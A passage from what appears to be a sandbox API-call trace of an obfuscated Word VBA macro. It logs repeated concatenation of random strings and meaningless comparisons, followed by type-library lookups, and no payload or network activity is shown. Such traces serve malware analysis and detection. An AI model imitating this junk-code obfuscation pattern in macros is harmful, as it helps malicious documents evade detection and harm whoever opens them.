pbstrResult=0x125694) returned 0x0 [0023.453] VarAdd (in: pvarLeft=0x1259d4, pvarRight=0x12576c, pvarResult=0x1259c4 | out: pvarResult=0x1259c4) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuant", bstrRight="gkXhpaH", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuantgkXhpaH", bstrRight="XTYbKbhZGVA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuantgkXhpaHXTYbKbhZGVA", bstrRight="tFmhVnR", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuantgkXhpaHXTYbKbhZGVAtFmhVnR", bstrRight="gXKRAers", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuantgkXhpaHXTYbKbhZGVAtFmhVnRgXKRAers", bstrRight="kTHZrxKVBk", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuantgkXhpaHXTYbKbhZGVAtFmhVnRgXKRAerskTHZrxKVBk", bstrRight="NGcwzdsLV", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="ZhAyuantgkXhpaHXTYbKbhZGVAtFmhVnRgXKRAerskTHZrxKVBkNGcwzdsLV", bstrRight="pDuZtEGx", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCmp (bstrLeft="False", bstrRight="ZhAyuantgkXhpaHXTYbKbhZGVAtFmhVnRgXKRAerskTHZrxKVBkNGcwzdsLVpDuZtEGx", lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YyzpDedfr", bstrRight="BkUFdGLKEP", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YyzpDedfrBkUFdGLKEP", bstrRight="tZZnVny", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YyzpDedfrBkUFdGLKEPtZZnVny", bstrRight="kVxyDpBUbe", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YyzpDedfrBkUFdGLKEPtZZnVnykVxyDpBUbe", bstrRight="BHmmtxs", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YyzpDedfrBkUFdGLKEPtZZnVnykVxyDpBUbeBHmmtxs", bstrRight="bVTRGXh", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YyzpDedfrBkUFdGLKEPtZZnVnykVxyDpBUbeBHmmtxsbVTRGXh", bstrRight="zWtSrLD", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.453] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x12574c, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YvzBwVhw", bstrRight="WvbDeNRgm", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YvzBwVhwWvbDeNRgm", bstrRight="HGmxRKpeccm", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="YvzBwVhwWvbDeNRgmHGmxRKpeccm", bstrRight="GKEXXuEE", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="YvzBwVhwWvbDeNRgmHGmxRKpeccmGKEXXuEE", bstrRight="EFdUevzfcdu", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="YvzBwVhwWvbDeNRgmHGmxRKpeccmGKEXXuEEEFdUevzfcdu", bstrRight="dASKDCw", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="YvzBwVhwWvbDeNRgmHGmxRKpeccmGKEXXuEEEFdUevzfcdudASKDCw", bstrRight="UrYngTuwudm", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x12573c, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.454] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0023.454] VarBstrCat (in: bstrLeft="UmBWZzdBLe", bstrRight="eWAZhNm", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="UmBWZzdBLeeWAZhNm", bstrRight="uhFcwDBzk", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="UmBWZzdBLeeWAZhNmuhFcwDBzk", bstrRight="nHhgBLCkcKV", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="UmBWZzdBLeeWAZhNmuhFcwDBzknHhgBLCkcKV", bstrRight="RZvXMymAw", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="UmBWZzdBLeeWAZhNmuhFcwDBzknHhgBLCkcKVRZvXMymAw", bstrRight="FadhENfdv", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="UmBWZzdBLeeWAZhNmuhFcwDBzknHhgBLCkcKVRZvXMymAwFadhENfdv", bstrRight="SsCaYfh", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x12572c, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="brYLsbAwd", bstrRight="dfbPcNdGrGa", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="brYLsbAwddfbPcNdGrGa", bstrRight="DDZzwbGpbZ", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="brYLsbAwddfbPcNdGrGaDDZzwbGpbZ", bstrRight="RgvUeegFf", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="brYLsbAwddfbPcNdGrGaDDZzwbGpbZRgvUeegFf", bstrRight="dZawxtuHYZA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="brYLsbAwddfbPcNdGrGaDDZzwbGpbZRgvUeegFfdZawxtuHYZA", bstrRight="svzuRKnVxRt", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="brYLsbAwddfbPcNdGrGaDDZzwbGpbZRgvUeegFfdZawxtuHYZAsvzuRKnVxRt", bstrRight="DkwNAKdEk", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarAdd (in: pvarLeft=0x125a28, pvarRight=0x12571c, pvarResult=0x125a18 | out: pvarResult=0x125a18) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkD", bstrRight="wBcBWbukvMm", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkDwBcBWbukvMm", bstrRight="HPMteNZx", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkDwBcBWbukvMmHPMteNZx", bstrRight="VgTWNcbskYD", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkDwBcBWbukvMmHPMteNZxVgTWNcbskYD", bstrRight="kRWGaGrebrB", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkDwBcBWbukvMmHPMteNZxVgTWNcbskYDkRWGaGrebrB", bstrRight="zTZskDx", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkDwBcBWbukvMmHPMteNZxVgTWNcbskYDkRWGaGrebrBzTZskDx", bstrRight="xXSDNkmk", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCat (in: bstrLeft="SDXbGkDwBcBWbukvMmHPMteNZxVgTWNcbskYDkRWGaGrebrBzTZskDxxXSDNkmk", bstrRight="ZkyfVYCCChK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.454] VarBstrCmp (bstrLeft="False", bstrRight="SDXbGkDwBcBWbukvMmHPMteNZxVgTWNcbskYDkRWGaGrebrBzTZskDxxXSDNkmkZkyfVYCCChK", lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="VWpnWtWz", bstrRight="NcvvvbfEx", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="VWpnWtWzNcvvvbfEx", bstrRight="evScFkctbE", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="VWpnWtWzNcvvvbfExevScFkctbE", bstrRight="gLYELnNenFZ", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="VWpnWtWzNcvvvbfExevScFkctbEgLYELnNenFZ", bstrRight="MspEUzMd", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="VWpnWtWzNcvvvbfExevScFkctbEgLYELnNenFZMspEUzMd", bstrRight="htLHGUXFdH", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="VWpnWtWzNcvvvbfExevScFkctbEgLYELnNenFZMspEUzMdhtLHGUXFdH", bstrRight="nVKCKsHa", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.455] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x1256fc, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="csFtNHbbnD", bstrRight="rfxEpKWn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="csFtNHbbnDrfxEpKWn", bstrRight="zkKuyCXSLb", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="csFtNHbbnDrfxEpKWnzkKuyCXSLb", bstrRight="GCmStsTVCWD", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="csFtNHbbnDrfxEpKWnzkKuyCXSLbGCmStsTVCWD", bstrRight="CkcAgSN", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="csFtNHbbnDrfxEpKWnzkKuyCXSLbGCmStsTVCWDCkcAgSN", bstrRight="NZFPvNaUt", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="csFtNHbbnDrfxEpKWnzkKuyCXSLbGCmStsTVCWDCkcAgSNNZFPvNaUt", bstrRight="GvrfrndDrSF", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x1256ec, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.455] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="gWkuMCs", bstrRight="kxhkZrYW", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="gWkuMCskxhkZrYW", bstrRight="zvaSnrYuny", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="gWkuMCskxhkZrYWzvaSnrYuny", bstrRight="EmkzbBuax", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="gWkuMCskxhkZrYWzvaSnrYunyEmkzbBuax", bstrRight="UkvuyXMvzM", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="gWkuMCskxhkZrYWzvaSnrYunyEmkzbBuaxUkvuyXMvzM", bstrRight="PUyyWDv", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="gWkuMCskxhkZrYWzvaSnrYunyEmkzbBuaxUkvuyXMvzMPUyyWDv", bstrRight="YwDLwWtwDhk", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x1256dc, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwS", bstrRight="YBhPFwUnkN", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwSYBhPFwUnkN", bstrRight="BCMYsFS", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwSYBhPFwUnkNBCMYsFS", bstrRight="uDACKdVt", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwSYBhPFwUnkNBCMYsFSuDACKdVt", bstrRight="rVeXEAtn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwSYBhPFwUnkNBCMYsFSuDACKdVtrVeXEAtn", bstrRight="ymYBaKA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwSYBhPFwUnkNBCMYsFSuDACKdVtrVeXEAtnymYBaKA", bstrRight="tPxCaGYgcHn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCat (in: bstrLeft="UcDHkNdgGwSYBhPFwUnkNBCMYsFSuDACKdVtrVeXEAtnymYBaKAtPxCaGYgcHn", bstrRight="vFXwLZecKMt", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.455] VarBstrCmp (bstrLeft="False", bstrRight="UcDHkNdgGwSYBhPFwUnkNBCMYsFSuDACKdVtrVeXEAtnymYBaKAtPxCaGYgcHnvFXwLZecKMt", lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="WcWGVZxvbv", bstrRight="wLTzkvpWTZ", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="WcWGVZxvbvwLTzkvpWTZ", bstrRight="PEWXYXXvD", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="WcWGVZxvbvwLTzkvpWTZPEWXYXXvD", bstrRight="dVtGSfaTDW", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="WcWGVZxvbvwLTzkvpWTZPEWXYXXvDdVtGSfaTDW", bstrRight="HXnePFyw", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="WcWGVZxvbvwLTzkvpWTZPEWXYXXvDdVtGSfaTDWHXnePFyw", bstrRight="vCsvdTNyc", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="WcWGVZxvbvwLTzkvpWTZPEWXYXXvDdVtGSfaTDWHXnePFywvCsvdTNyc", bstrRight="MVByGEKXEzc", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.456] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x1256bc, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmW", bstrRight="LzxWFuCL", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmWLzxWFuCL", bstrRight="mgeVcxVF", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmWLzxWFuCLmgeVcxVF", bstrRight="BZkUkGtsBfC", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmWLzxWFuCLmgeVcxVFBZkUkGtsBfC", bstrRight="bnTaUYFmsdT", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmWLzxWFuCLmgeVcxVFBZkUkGtsBfCbnTaUYFmsdT", bstrRight="ZdeYysxR", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmWLzxWFuCLmgeVcxVFBZkUkGtsBfCbnTaUYFmsdTZdeYysxR", bstrRight="fDSwgeE", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarBstrCat (in: bstrLeft="VzznTVmWLzxWFuCLmgeVcxVFBZkUkGtsBfCbnTaUYFmsdTZdeYysxRfDSwgeE", bstrRight="PCMpMucuwM", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.456] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ad0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0023.484] CRetailMalloc_Free () returned 0xd270001 [0023.484] CRetailMalloc_Alloc () returned 0x78b1f10 [0023.485] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.485] IUnknown:Release (This=0x569efdc) returned 0x4 [0023.485] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12633c | out: ppvObject=0x12633c*=0x0) returned 0x80004002 [0023.485] IUnknown:Release (This=0x569f008) returned 0x3 [0023.485] IUnknown:QueryInterface (in: This=0x569f008, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12633c | out: ppvObject=0x12633c*=0x0) returned 0x80004002 [0023.485] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.485] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12633c | out: ppvObject=0x12633c*=0x0) returned 0x80004002 [0023.485] CRetailMalloc_Alloc () returned 0x56a9798 [0023.485] CRetailMalloc_Alloc () returned 0x5796300 [0023.485] CRetailMalloc_Alloc () returned 0x5796370 [0023.485] CRetailMalloc_Alloc () returned 0x786de60 [0023.485] CRetailMalloc_Alloc () returned 0x786e088 [0023.485] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12633c | out: ppvObject=0x12633c*=0x0) returned 0x80004002 [0023.485] IUnknown:QueryInterface (in: This=0x569f008, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12633c | out: ppvObject=0x12633c*=0x0) returned 0x80004002 [0023.485] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12633c | out: ppvObject=0x12633c*=0x0) returned 0x80004002 [0023.485] CRetailMalloc_Alloc () returned 0x581a900 [0023.485] ITypeLib:RemoteGetLibAttr (in: This=0x2876548, ppTLibAttr=0x125e38, pDummy=0x126020 | out: ppTLibAttr=0x125e38, pDummy=0x126020*=0x0) returned 0x0 [0023.485] ITypeLib:RemoteGetDocumentation (in: This=0x2876548, index=-1, refPtrFlags=0x125e34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020*=0x0) returned 0x0 [0023.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=49, lpMultiByteStr=0x125e84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL^\x12", lpUsedDefaultChar=0x0) returned 49 [0023.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x125f8c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0023.485] IUnknown:AddRef (This=0x2876548) returned 0x9 [0023.485] ITypeLib:LocalReleaseTLibAttr (This=0x2876548) returned 0x55d8dc8 [0023.486] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library") returned 0 [0023.486] ITypeLib:RemoteGetLibAttr (in: This=0x2875630, ppTLibAttr=0x125e38, pDummy=0x126020 | out: ppTLibAttr=0x125e38, pDummy=0x126020*=0x0) returned 0x0 [0023.486] ITypeLib:RemoteGetDocumentation (in: This=0x2875630, index=-1, refPtrFlags=0x125e34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020*=0x0) returned 0x0 [0023.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library", cchWideChar=53, lpMultiByteStr=0x125e84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 53 [0023.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x125f8c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0023.486] IUnknown:AddRef (This=0x2875630) returned 0xd [0023.486] ITypeLib:LocalReleaseTLibAttr (This=0x2875630) returned 0x55d8940 [0023.486] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library") returned -5 [0023.486] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0023.486] ITypeLib:RemoteGetLibAttr (in: This=0x2876770, ppTLibAttr=0x125e38, pDummy=0x126020 | out: ppTLibAttr=0x125e38, pDummy=0x126020*=0x0) returned 0x0 [0023.486] ITypeLib:RemoteGetDocumentation (in: This=0x2876770, index=-1, refPtrFlags=0x125e34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020*=0x0) returned 0x0 [0023.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x125e84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Office15\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0023.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x125f8c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0023.486] CRetailMalloc_Alloc () returned 0x786e700 [0023.486] IUnknown:AddRef (This=0x2876770) returned 0x8 [0023.487] ITypeLib:LocalReleaseTLibAttr (This=0x2876770) returned 0x55d8dc8 [0023.487] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library") returned 2 [0023.487] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0023.487] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0 [0023.487] ITypeLib:RemoteGetLibAttr (in: This=0x2876bc0, ppTLibAttr=0x125e38, pDummy=0x126020 | out: ppTLibAttr=0x125e38, pDummy=0x126020*=0x0) returned 0x0 [0023.487] ITypeLib:RemoteGetDocumentation (in: This=0x2876bc0, index=-1, refPtrFlags=0x125e34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x126020*=0x0) returned 0x0 [0023.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", cchWideChar=63, lpMultiByteStr=0x125e84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL\x01È^\x12", lpUsedDefaultChar=0x0) returned 63 [0023.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x125f8c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0023.487] IUnknown:AddRef (This=0x2876bc0) returned 0x7 [0023.487] ITypeLib:LocalReleaseTLibAttr (This=0x2876bc0) returned 0x55d8940 [0023.487] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), 